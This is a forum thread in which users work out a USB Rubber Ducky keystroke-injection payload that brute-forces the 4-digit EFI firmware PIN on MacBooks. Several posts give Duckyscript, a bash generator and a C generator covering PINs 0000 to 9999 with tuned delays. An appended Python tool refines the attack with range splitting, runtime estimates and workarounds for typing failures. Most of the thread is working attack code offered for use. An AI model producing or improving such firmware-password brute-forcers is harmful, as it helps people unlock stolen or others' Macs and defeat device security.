anto0522 Posted December 23, 2014 (edited)

Hi everyone,

I recently bought a MacBook from eBay, and after receiving it I formatted the hard drive to do a clean install of the OS. That's where things got a bit tricky... I can't reinstall the OS, since I am prompted for the EFI password every time I attempt to boot from a CD or a bootable USB key. Neither I nor the previous owner know the password, and Apple wants to charge me a fair bit of money to recover it.

I've done some research, and it seems possible to brute-force the password, which is most likely a 4-digit PIN code. I decided to use the Rubber Ducky to create a payload similar to the one Darren uses to hack the PIN of an Android phone, but I haven't had much luck so far. The laptop seems to recognise the Ducky as an external keyboard but doesn't type the full PIN; only a single digit ends up being typed. I reckon it's pretty much the same problem as this user ran into: https://forums.hak5.org/index.php?/topic/32410-macosx-efi-anyone-have-payload-for-efi-password/

I've done a fair bit of research, and it seems that people wanting to brute-force the EFI password mostly use the Teensy development board. I'm pretty sure that the Ducky is perfectly capable of doing the same thing, and I would like to use this thread to come up with a payload that everyone can use to brute-force Mac EFIs. I have noticed that a few people have already posted on this forum about this issue (see link below), but no one has posted a working payload yet. https://forums.hak5.org/index.php?/topic/30800-payload-on-macbook-air2010-2013-help-needed/

This is the non-working payload I have been using so far; any help would be greatly appreciated:

DELAY 5000
STRING 0000
ENTER
DELAY 10000
STRING 0001
ENTER
DELAY 10000
STRING 0002
ENTER
DELAY 10000
...

Useful link: http://www.hackmac.org/forum/topic/1524-efi-pin-bruteforcing/

Edited December 23, 2014 by anto0522
dataghost Posted January 1, 2015

I too am looking for help on this. I just ordered a Teensy 3.1 because it's already supported. I wish I was smarter, so I could get the Ducky to do this. I am new to the Ducky; I love it, I just need some guidance. Maybe Darren has some insight; that would be awesome.
nemesis_00 Posted January 1, 2015

Have you already tried one digit at a time, with a delay?
bingowings85 Posted January 2, 2015

How will the script know when to stop? What about a random Markov walk?
dataghost Posted January 2, 2015

I'm not sure what can be done on this. I too would love help, and I don't know scripting well enough. I'll keep playing around.
dataghost Posted January 4, 2015

I modified the original Android script so that there is only one ENTER and not two. I think to make this work it needs to have a pause between keystrokes; it's trying to type too fast, I believe. Here is the modified script, so that one ENTER is placed instead of two:

# Needs bash (brace expansion keeps the leading zeros) and GNU sed (first~step line addressing).
echo DELAY 5000 > android_brute-force_0000-9999.txt
echo {0000..9999} |                    # 0000 0001 ... 9999 on one line
  xargs -n 1 echo STRING |             # one "STRING nnnn" line per PIN
  sed '0~5 s/$/\nWAIT/' |              # add a WAIT marker line after every 5th PIN
  sed '0~1 s/$/\nDELAY 1000\nENTER/' | # after every line (WAIT lines included): one DELAY, a single ENTER
  sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/' \
  >> android_brute-force_0000-9999.txt # expand the marker into the extra ENTERs

I don't know what to change from here, but what I believe would need to happen is, let's say, a 500 ms delay between keystrokes, so for PIN 0000 it would need to be:

ENTER 0
DELAY 500ms
ENTER 0
DELAY 500ms
ENTER 0
DELAY 500ms
ENTER

and so on. Does anyone know how to write this script so we can give this a shot? Thanks
belly Posted February 22, 2015

Hey, I wrote a small C program to generate a text file that I then translate via an online encoder.

#include <stdio.h>

int main(void)
{
    FILE *datei;

    datei = fopen("test.txt", "w");
    if (datei == NULL) {
        printf("Error opening the file.\n");
        return 1;
    }

    /* give the firmware prompt time to come up before the first attempt */
    fprintf(datei, "DELAY 5000\n");

    int i;
    /* 0000-0009: three leading zeros, each typed as its own STRING */
    for (i = 0; i < 10; i++) {
        fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i);
    }
    /* 0010-0099: two leading zeros, then the last two digits as one STRING */
    for (i = 10; i < 100; i++) {
        fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
    }
    /* 0100-0999: one leading zero, then the last three digits as one STRING */
    for (i = 100; i < 1000; i++) {
        fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
    }
    /* 1000-9999: no padding, the whole PIN as one STRING */
    for (i = 1000; i < 10000; i++) {
        fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
    }

    fclose(datei);
    return 0;
}

What I realized too is that you have to put it in digit by digit; STRING 0001 ENTER is way too fast! I keep playing around with the different delays. By now my payload is able to run for about two hours brute-forcing an MBAir, but then something seems to go wrong, because it only enters three digits after running two hours... I also realized there are differences between a MacBook Retina and a MacBook Air. I attached the .txt and .bin of my payload; if anyone is interested or has an idea, I would love to figure out what the problem is! And a small video of the Ducky starting to attack^^ https://www.facebook.com/video.php?v=10204806167131861&set=vb.1168804757&type=3&theater

So long, belly

payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html
payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html
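The generator dataghost asked for and belly approximated in C, written out as an added example (not code from this thread, nor from Hak5): a Python script that emits Duckyscript typing every PIN digit as its own STRING with a DELAY between digits, zero-padded to the PIN length so no special cases per range are needed, then ENTER and a longer DELAY while the prompt rejects the guess. The default delays (5000 ms at the start, 500 ms between keys, 7500 ms after ENTER) are the values used in the posts above and are assumptions; the right values for a given Mac can only be found on the hardware. The function names, the start/stop range arguments and the runtime estimate are my own additions.

```python
"""Generate a Duckyscript payload that brute-forces a numeric PIN one digit at
a time.  Added example, not the thread's own code.  The delay defaults are the
values from the posts above and are assumptions to be tuned per target."""

import sys
from typing import List, Optional


def pin_keystrokes(pin: str, key_delay_ms: int, submit_delay_ms: int) -> List[str]:
    """Duckyscript lines for one attempt: each digit as its own STRING with a
    DELAY after it, then ENTER and a DELAY while the prompt rejects the guess."""
    lines: List[str] = []
    for digit in pin:
        lines.append(f"STRING {digit}")
        lines.append(f"DELAY {key_delay_ms}")
    lines.append("ENTER")
    lines.append(f"DELAY {submit_delay_ms}")
    return lines


def generate_payload(length: int = 4, start: int = 0, stop: Optional[int] = None,
                     initial_delay_ms: int = 5000, key_delay_ms: int = 500,
                     submit_delay_ms: int = 7500) -> str:
    """Payload covering PINs start .. stop-1 (default: all 10**length of them),
    zero-padded to `length`, e.g. 7 -> "0007" for a 4-digit PIN."""
    if stop is None:
        stop = 10 ** length
    if not 0 <= start < stop <= 10 ** length:
        raise ValueError("start/stop out of range for the PIN length")
    lines = [f"DELAY {initial_delay_ms}"]  # let the firmware prompt come up first
    for n in range(start, stop):
        lines.extend(pin_keystrokes(str(n).zfill(length), key_delay_ms, submit_delay_ms))
    return "\n".join(lines) + "\n"


def attempts_in(payload: str) -> int:
    """Number of PIN submissions in a payload (exactly one ENTER per attempt)."""
    return sum(1 for line in payload.splitlines() if line == "ENTER")


def estimate_runtime_s(attempts: int, length: int = 4, initial_delay_ms: int = 5000,
                       key_delay_ms: int = 500, submit_delay_ms: int = 7500) -> float:
    """Lower bound on wall-clock time from the DELAY lines alone (the time the
    Ducky spends actually sending keystrokes is not counted)."""
    per_attempt_ms = length * key_delay_ms + submit_delay_ms
    return (initial_delay_ms + attempts * per_attempt_ms) / 1000


if __name__ == "__main__":
    # usage: python3 efi_pin_payload.py [start] [stop] > payload.txt
    first = int(sys.argv[1]) if len(sys.argv) > 1 else 0
    last = int(sys.argv[2]) if len(sys.argv) > 2 else None
    text = generate_payload(start=first, stop=last)
    n = attempts_in(text)
    print(f"{n} attempts, at least {estimate_runtime_s(n) / 3600:.1f} h of delays",
          file=sys.stderr)
    sys.stdout.write(text)
```

Encode the resulting payload.txt with the Duckyscript encoder as usual. The two optional arguments let you split the key space into smaller payloads (for example `0 2500`, then `2500 5000`), which is the practical answer to belly's observation that the Ducky loses sync after a couple of hours: restart from the last range that was still typing correctly instead of from 0000. With the default delays the full 10000-PIN range is at least 95005 s of DELAY lines, about 26.4 hours, so the per-attempt wait after ENTER dominates the whole job and is the value worth measuring most carefully on the target.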